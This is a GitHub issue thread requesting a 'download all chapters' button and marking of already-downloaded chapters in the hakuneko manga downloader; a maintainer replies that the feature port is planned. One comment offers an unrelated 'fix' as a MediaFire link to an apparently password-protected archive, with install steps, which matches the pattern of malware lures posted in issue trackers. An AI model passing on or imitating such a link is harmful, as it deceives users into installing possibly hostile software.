### ISSUE TITLE
[Feature]"Download all chapter" button and mark the chapters already downloaded

### ISSUE THREAD

**Issue by Torablue** [manga-download/hakuneko#7365]
**Is your feature request related to a problem? Please describe.**
Downloading new chapters is fine, but the problem is when I want to download all chapters of a manga. Clicking all chapters from 1 until the latest is time consuming. Not knowing which chapter I already downloaded is confusing too if I want to download only a few chapters. I have to double check in the explorer. That's why I still use the old hakuneko.

**Describe the solution you'd like**
Add a "download all chapter" button like in the old hakuneko, and change the font color of chapters that already exist in my PC.

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Sheepux** [comment]
Porting existing features from haku to haru is already part of plan, there is no need to create issues for each missing part
